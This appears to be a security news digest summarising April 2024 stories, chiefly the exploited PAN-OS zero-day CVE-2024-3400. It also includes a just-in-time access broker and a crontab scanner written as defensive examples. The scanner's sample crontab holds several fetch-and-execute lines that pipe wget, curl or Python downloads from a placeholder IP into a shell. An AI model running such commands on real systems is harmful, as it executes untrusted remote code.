Daily Brief

Find articles below; each entry is followed by a generated summary

Total articles found: 11811

Checks for new stories every ~15 minutes

2024-04-15 13:01:24 bleepingcomputer NATION STATE ACTIVITY Palo Alto Networks Fixes Zero-Day Exploiting Firewalls
Palo Alto Networks has addressed a zero-day vulnerability, tracked as CVE-2024-3400, affecting several versions of its PAN-OS firewall software, including PAN-OS 10.2, 11.0, and 11.1. The vulnerability, actively exploited since March 26, allows an unauthenticated attacker to execute code as root on a targeted device with no user interaction. Hotfixes have been issued for the affected release trains, with further updates pending for other maintenance versions. The exploit was used to plant a backdoor via command injection, giving the attackers a foothold for network intrusion and data theft; Volexity tracks the operators as UTA0218 and assesses them as likely state-sponsored. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities catalog. Recommended interim measures include disabling device telemetry until patches are applied and, for customers with a Threat Prevention subscription, enabling the vendor-supplied threat signature. Over 82,000 internet-exposed PAN-OS devices were identified, a significant share of them in the United States.
2024-04-15 10:28:51 thehackernews MISCELLANEOUS Enhancing Security With Just-in-Time Privileged Access
Just-in-Time (JIT) privileged access management is gaining adoption as a way to control the risk of privilege misuse: users receive the access a task requires only for the time the task takes, rather than holding high-level privileges continuously. JIT applies the principle of least privilege in the time dimension, which shrinks the window for privilege escalation and credential-based attacks. Because standing privileges are eliminated, dormant but powerful accounts are no longer available for an attacker to take over, and an intruder's reconnaissance finds fewer privileged targets. One Identity's Safeguard, a privileged access management product, supports JIT provisioning, enabling organisations to activate accounts and attach access rights dynamically in response to a specific access request. Active Roles (ARS) complements this by automating account activation, group membership changes, and attribute synchronisation across Active Directory. Together, Safeguard and Active Roles allow JIT provisioning configurations in which a privileged role exists only for the lifetime of an approved request. The article presents JIT provisioning as an essential component of a privileged access management strategy, reducing privilege misuse by ensuring that elevated access is temporary and granted only when needed.
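The mechanics described above (no standing privilege, a bounded grant window, automatic revocation) can be illustrated with a small broker. This is an added example written for this brief, not code from the article or from the Safeguard or Active Roles products; the class names, the one-hour cap, and the "alice"/"bob" eligibility data are all assumptions made for the illustration.

```python
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone


@dataclass
class Grant:
    """A single time-bound elevation: who, which role, when it ends, and why."""
    user: str
    role: str
    granted_at: datetime
    expires_at: datetime
    ticket: str  # change/justification reference supplied with the request


@dataclass
class JitBroker:
    """Hypothetical JIT broker. Nobody holds a privileged role at rest; a role is
    attached for a bounded window and detached when that window closes."""
    max_ttl: timedelta = timedelta(hours=1)            # assumed policy cap
    eligible: dict = field(default_factory=dict)       # user -> set of roles they may request
    grants: list = field(default_factory=list)         # currently live grants only
    audit: list = field(default_factory=list)          # (event, user, role, detail)

    def request(self, user, role, ttl, ticket, now):
        """Grant `role` to `user` for `ttl` if policy allows; otherwise deny and log."""
        if role not in self.eligible.get(user, set()):
            self.audit.append(("denied", user, role, "not eligible for role"))
            return None
        if ttl <= timedelta(0) or ttl > self.max_ttl:
            self.audit.append(("denied", user, role, "ttl outside policy"))
            return None
        grant = Grant(user, role, now, now + ttl, ticket)
        self.grants.append(grant)
        self.audit.append(("granted", user, role, grant.expires_at.isoformat()))
        return grant

    def expire(self, now):
        """Revoke every grant whose window has closed; returns how many were revoked."""
        live, dead = [], []
        for g in self.grants:
            (live if g.expires_at > now else dead).append(g)
        for g in dead:
            self.audit.append(("revoked", g.user, g.role, "expired"))
        self.grants = live
        return len(dead)

    def release(self, user, role, now):
        """Early release by the user: the window closes as soon as the task is done."""
        before = len(self.grants)
        self.grants = [g for g in self.grants if not (g.user == user and g.role == role)]
        if len(self.grants) != before:
            self.audit.append(("revoked", user, role, "released early"))
        return before - len(self.grants)

    def has_role(self, user, role, now):
        """Authorization check at time of use: only an unexpired grant counts."""
        self.expire(now)
        return any(g.user == user and g.role == role for g in self.grants)


def demo():
    """Walk one grant through its life cycle; constructed data, no real directory."""
    t0 = datetime(2024, 4, 15, 9, 0, tzinfo=timezone.utc)
    broker = JitBroker(eligible={"alice": {"DomainAdmins"}})
    before = broker.has_role("alice", "DomainAdmins", t0)                       # no standing privilege
    grant = broker.request("alice", "DomainAdmins", timedelta(minutes=30), "CHG-1234", t0)
    during = broker.has_role("alice", "DomainAdmins", t0 + timedelta(minutes=10))
    after = broker.has_role("alice", "DomainAdmins", t0 + timedelta(minutes=31))  # auto-revoked
    bob = broker.request("bob", "DomainAdmins", timedelta(minutes=5), "CHG-1", t0)  # not eligible
    return before, grant is not None, during, after, bob is None


if __name__ == "__main__":
    print(demo())
```

The check that matters is `has_role` being evaluated at the moment of use rather than at login: a session that was privileged ten minutes ago is not privileged now, which is exactly the property that removes dormant high-privilege accounts from an attacker's reach.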
2024-04-15 09:07:16 thehackernews NATION STATE ACTIVITY LightSpy iOS Spyware Intensifies Threats in South Asia
Researchers have uncovered an espionage campaign using the LightSpy iOS spyware against iPhone users in South Asia. The malware, whose implant framework is referred to as "F_Warehouse", has a modular structure with plugins for file theft, surveillance, and data extraction from a range of applications. It is believed to be delivered through compromised news websites that the targets visit. Strong overlaps have been identified between LightSpy and the DragonEgg Android spyware, which has been attributed to the Chinese nation-state group APT41. LightSpy's capabilities include reading contacts, recording VoIP calls, and hijacking the camera and microphone. This version pins the certificate of its command-and-control servers, which prevents interception and analysis of its C2 traffic. Native Chinese-language comments in the code and server connections to a Chinese IP address point to possible state-sponsored origins. Separately, Apple has issued threat notifications to users in 92 countries, including India, warning that they may be targeted by mercenary spyware.
2024-04-15 08:21:16 thehackernews MALWARE Urgent Security Patch for Palo Alto Networks' PAN-OS Vulnerability
Palo Alto Networks has released hotfixes for a critical vulnerability in PAN-OS that is being actively exploited in the wild. The flaw, tracked as CVE-2024-3400 with a CVSS score of 10.0, is a command injection that allows unauthenticated code execution. Affected versions are PAN-OS 10.2, 11.0, and 11.1, specifically on devices configured with a GlobalProtect gateway or portal and with device telemetry enabled. The flaw has been used to deploy a Python-based backdoor named UPSTYLE that lets the attackers run arbitrary commands. Volexity tracks the group behind the exploitation as UTA0218 and has observed activity since at least March 26, 2024. Documented post-exploitation includes deploying further payloads, exfiltrating data, removing logs, and opening reverse shells. Palo Alto Networks' response so far consists of hotfixes for the first maintenance releases, with further releases scheduled over the coming days. The full scope of compromise resulting from this vulnerability is still unknown.
2024-04-15 08:05:49 theregister MISCELLANEOUS Upcoming Webinar on Third-Party Risk and Real-Time Threat Intelligence
Andy Grayland, CISO at Silobreaker, will address the escalating risks associated with third-party partners in a webinar scheduled for 18 April. The session will cover how real-time threat intelligence can be used to identify and mitigate third-party risk, what data can be collected, and how it can be combined with internal data sources to improve an organisation's security posture. It will also discuss how to manage and minimise organisational risk through collaboration with partners, with the aim of giving attendees actionable guidance on defending against vulnerabilities introduced by third parties in the supply chain. Registration for the webinar is open.
2024-04-15 01:59:57 theregister MISCELLANEOUS U.S. House Passes FISA Renewal; Global Tech Security Concerns
The U.S. House of Representatives approved the renewal of Section 702 of FISA, allowing warrantless surveillance to continue. Despite bipartisan concern, a proposed amendment that would have required a warrant before searching the collected data for US citizens' communications failed on a 212-212 tie vote. Dutch chipmaker Nexperia, owned by Chinese firm Wingtech, suffered a cyberattack in which potentially hundreds of gigabytes of data were stolen and leaked online. A Microsoft-signed executable was revealed to be a backdoor, a reminder that a trusted code signature is not evidence of benign behaviour. CISA has upgraded its malware analysis system, expanding its capacity to detect and analyse malicious software submitted by authorised entities. CISA also issued an alert about Sisense, a data analytics company compromised after attackers obtained credentials giving them access to the company's Amazon S3 storage; its customers include Nasdaq. Together these items illustrate the range of current challenges, from legislative debates over privacy to critical vulnerabilities and international cyberattacks.
2024-04-14 22:31:44 bleepingcomputer MISCELLANEOUS OpenTable Reverses Decision on Adding Names, Photos to Reviews
OpenTable initially planned to display members' first names and profile pictures on both old and new reviews. The plan drew significant backlash from members concerned about privacy and about possible retaliation from restaurant owners. In response, OpenTable will keep existing reviews anonymous and apply the first-name-and-photo policy only to new reviews. The change had been scheduled to launch on May 22, but OpenTable has postponed it without giving a new date. Before the policy takes effect, OpenTable encourages users to update their profiles with the first name and photo they want shown on future reviews. OpenTable says the goal is to increase transparency and trust in reviews, but it has adjusted its approach in light of community feedback.
2024-04-13 14:32:13 thehackernews CYBERCRIME Security Engineer Sentenced for $12.3M Crypto Exchange Thefts
Shakeeb Ahmed, a former security engineer, was sentenced to three years in prison for hacking two decentralised cryptocurrency exchanges and stealing over $12.3 million. Ahmed pleaded guilty to computer fraud; he exploited a flaw in the exchanges' smart contracts to manipulate transactions and withdraw inflated fees. The thefts occurred in July 2022; Ahmed was arrested in July 2023 and pleaded guilty in December 2023. After the first hack, Ahmed negotiated with the exchange to return part of the stolen funds on condition that it not notify law enforcement, keeping a portion as a self-declared "white hat" bounty. The second platform, Nirvana Finance, offered Ahmed a bug bounty to recover the stolen funds, which he declined; the loss forced the platform to shut down. Ahmed laundered the stolen cryptocurrency through cross-chain bridges and mixers, converting it into Monero to frustrate tracing. In addition to his prison term, Ahmed faces three years of supervised release, must forfeit around $12.3 million, and must pay over $5 million in restitution.
2024-04-13 14:21:48 bleepingcomputer CYBERCRIME Joint US-Australian Operation Leads to Arrests of Cybercrime Tool Developers
A joint operation by the Australian Federal Police (AFP) and the FBI has resulted in charges against two individuals linked to the creation and sale of the "Firebird" remote access trojan (RAT), later rebranded "Hive". The investigation, opened in 2020, focused on an Australian man and Edmond Chakhmakhchyan of California, who allegedly developed and distributed the malware. The RAT was marketed on hacking forums and websites as a legitimate remote administration tool, but it offered covert access, recovery of passwords saved in browsers, and privilege escalation on victim systems. The Australian suspect faces twelve charges related to producing and distributing the RAT, carrying a combined maximum of 36 years in prison. Chakhmakhchyan is accused of advertising the RAT, processing Bitcoin payments, and providing technical support to buyers, and faces up to ten years if convicted. Evidence includes exchanges in which Chakhmakhchyan promoted the RAT's illicit capabilities to an undercover FBI agent and transactions in which buyers' intent to use it illegally was discussed openly. The Australian is due to appear at the Downing Centre Local Court on May 7, 2024, and Chakhmakhchyan is scheduled to appear in U.S. court on June 4, 2024.
2024-04-13 14:01:07 thehackernews NATION STATE ACTIVITY U.S. Sanctions Hamas Leaders for Cyber Influence and UAV Production
The U.S. Treasury Department has sanctioned Hamas spokesperson Hudhayfa Samir 'Abdallah al-Kahlut for his role in the group's cyber influence operations. Al-Kahlut leads the cyber influence unit, procured resources in Iran to support Hamas's online operations, is in charge of hosting the Izz al-Din al-Qassam Brigades' website, and has served as the group's public spokesperson since 2007. Separately, William Abu Shanab and Bara'a Hasan Farhat were sanctioned for their involvement in producing unmanned aerial vehicles (UAVs) used in terrorist activity. The designations are part of broader U.S. and European Union efforts to curb the capabilities of Hamas and associated groups. Earlier, the U.S. had sanctioned Iranian officials linked to attacks on critical infrastructure in the U.S. and other countries. The coordinated international sanctions aim to disrupt these groups' operational capacity, including cyber operations and UAV production.
2024-04-13 14:01:07 bleepingcomputer DATA BREACH Giant Tiger Data Breach Exposes 2.8 Million Customer Records
Canadian retailer Giant Tiger has confirmed a data breach in March 2024 affecting 2.8 million customer records. A threat actor has posted the stolen data on a hacking forum; it contains customers' email addresses, phone numbers, and postal addresses, and, according to the poster, details of customers' website activity. The breach stemmed from a security incident at a third-party vendor that manages customer communications for the retailer. Giant Tiger has notified affected customers and states that no payment information or passwords were compromised. The dataset has been added to the "Have I Been Pwned" service, so customers can check whether their information is included. Customers are advised to watch for phishing attempts that use the leaked contact details.
2024-04-13 12:39:42 bleepingcomputer NATION STATE ACTIVITY State-Sponsored Hackers Exploit Firewall Zero-Day to Steal Data
Suspected state-sponsored hackers have been exploiting a zero-day vulnerability (CVE-2024-3400) in Palo Alto Networks firewalls since March 26. The flaw allows unauthenticated remote code execution on PAN-OS, and patches were announced for release on April 14. The attackers installed a custom backdoor named 'Upstyle' on the PAN-OS system to execute commands and pivot into internal networks. The backdoor parses commands that the attacker embeds in otherwise innocuous-looking web requests to the device, so its tasking blends into normal traffic, and gives extensive control over the compromised firewall. Data stolen includes the Windows Active Directory database and browser data such as cookies and saved login credentials. Volexity, which discovered the intrusions, assesses that the sophistication and targeting point to a state-backed actor. The incident underscores the growing focus of state-sponsored groups on network edge devices as an entry point for espionage and data theft.
2024-04-13 09:06:27 bleepingcomputer MISCELLANEOUS UK Struggles with Forged Barcoded Stamps Despite New Security Features
Royal Mail introduced barcoded stamps to improve security and prevent forgery, but counterfeits remain in circulation. Recipients of mail bearing what Royal Mail deems "counterfeit stamps" must pay a £5 surcharge, though many senders insist the stamps they used were genuine. An investigation identified four major Chinese suppliers producing up to one million fake Royal Mail stamps a week. British MPs have described forgery on this scale as economic warfare, comparable to printing counterfeit money. Royal Mail blames UK Border Force for allowing counterfeit stamps into the country and admits that its scanning machines may misidentify genuine stamps. The Post Office, a separate company from Royal Mail, insists the stamps it sells come from secured Royal Mail supplies, which raises questions about security within the supply chain. Privacy concerns about barcoded stamps, which can erode the anonymity of traditional mail, were largely overlooked during the rollout. Despite the modernisation effort, the new system has not stopped the spread of counterfeit stamps.
2024-04-13 08:30:46 thehackernews NATION STATE ACTIVITY Advanced Persistent Threat Exploits Palo Alto Firewall Zero-Day
Threat actors exploited a zero-day flaw in Palo Alto Networks' PAN-OS software, tracked as CVE-2024-3400 with a critical CVSS score of 10.0. The activity, which Palo Alto Networks calls Operation MidnightEclipse, uses a Python backdoor and targeted firewalls with a specific configuration: a GlobalProtect gateway with device telemetry enabled. The attackers managed their access carefully, creating a cron job that fetched and executed commands from an external server, and touched only selected devices. Observed post-exploitation includes opening a reverse shell, pivoting into internal networks, and exfiltrating data. Volexity, which uncovered the in-the-wild exploitation, tracks the actor as UTA0218 and assesses it as highly capable and possibly state-backed, given the sophistication and resources on display. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the flaw to its KEV catalog, directing federal agencies to apply the vendor's patches. The attackers' overall objective appears to be theft of the domain backup DPAPI key, Active Directory credentials, and user data such as saved cookies and login details, in pursuit of broad network access and data extraction.
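Two of the reports above describe the same persistence trick: a cron job that fetches commands from an external server and executes them. The check below is a generic hunt for that pattern over crontab text, added here as an example; it is not Volexity's or Palo Alto Networks' tooling, it is not PAN-OS-specific, and the crontab lines are constructed for the demonstration (the page does not publish the actual entry used in these intrusions). The IP addresses are from the reserved documentation range.

```python
import re
from dataclasses import dataclass

# Constructed sample crontab (not from any real incident): two benign entries and
# three that download remote content and hand it to an interpreter.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/5 * * * * /opt/monitor/check_disk.sh >> /var/log/check_disk.log 2>&1
* * * * * /usr/bin/wget -qO- http://203.0.113.10/patch.sh | /bin/sh
*/15 * * * * curl -s https://203.0.113.10/u | bash
0 * * * * python3 -c "import urllib.request,os;os.system(urllib.request.urlopen('http://203.0.113.10/c').read())"
"""

# Tools commonly used to pull content from the network.
FETCHERS = re.compile(r"\b(curl|wget|fetch|python[23]?|perl)\b")
# A URL in the command line; stops at quotes, pipes and separators.
URL = re.compile(r"https?://[^\s'\"|;]+")
# Ways fetched content ends up executed: piped to a shell, or passed to a system()/exec()/eval.
EXEC_SINKS = re.compile(r"\|\s*(/bin/)?(ba|z|da)?sh\b|\bos\.system\(|\bexec\(|\beval\b")


@dataclass
class Finding:
    line_no: int
    schedule: str
    command: str
    urls: list
    reasons: list


def parse_crontab_line(line):
    """Split a crontab line into (schedule, command); None for blank/comment lines.
    Handles both five-field schedules and @reboot-style shortcuts."""
    s = line.strip()
    if not s or s.startswith("#"):
        return None
    if s.startswith("@"):
        parts = s.split(None, 1)
        return (parts[0], parts[1]) if len(parts) == 2 else None
    parts = s.split(None, 5)
    if len(parts) < 6:
        return None
    return " ".join(parts[:5]), parts[5]


def scan_crontab(text):
    """Flag entries that both fetch something remote and execute it.
    Extra context (every-minute schedule) is recorded as a reason but is not
    sufficient on its own, to keep ordinary monitoring jobs out of the results."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        parsed = parse_crontab_line(line)
        if parsed is None:
            continue
        schedule, command = parsed
        urls = URL.findall(command)
        fetches = bool(urls) and FETCHERS.search(command) is not None
        executes = EXEC_SINKS.search(command) is not None
        if not (fetches and executes):
            continue
        reasons = ["fetches remote content", "passes content to an interpreter"]
        if schedule == "* * * * *":
            reasons.append("runs every minute")
        findings.append(Finding(no, schedule, command, urls, reasons))
    return findings


if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {f.line_no}: {f.schedule} -> {f.urls} ({', '.join(f.reasons)})")
```

On a real host, feed it the output of `crontab -l` for each user plus the contents of the system cron directories; the URLs it extracts are the indicators to pivot on in proxy and DNS logs. Requiring both a fetch and an execution sink keeps the noise down, which is why the `check_disk.sh` entry is not reported even though it runs a script every five minutes.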
2024-04-12 22:45:42 theregister CYBERCRIME Critical Zero-Day Exploit Detected in Palo Alto Networks Firewalls
Palo Alto Networks issued a critical alert about a zero-day vulnerability in the PAN-OS software that powers its firewall and VPN products. The flaw, rated CVSS 10.0, allows unauthenticated remote code execution with root privileges. Exploitation has been observed against devices running PAN-OS 10.2, 11.0, and 11.1 with a GlobalProtect gateway and device telemetry enabled. Volexity, which first reported the activity, found that an attacker it tracks as UTA0218 used the flaw to install a Python backdoor and harvest sensitive configuration data to support lateral movement inside victim networks. The operation, which Palo Alto Networks calls "MidnightEclipse", dates back to at least March 26, 2024 and is ongoing. Mitigations include applying a GlobalProtect-specific vulnerability protection signature or temporarily disabling device telemetry until systems are patched. Palo Alto Networks promised full patches by April 14, alongside urgent notifications and support for affected customers.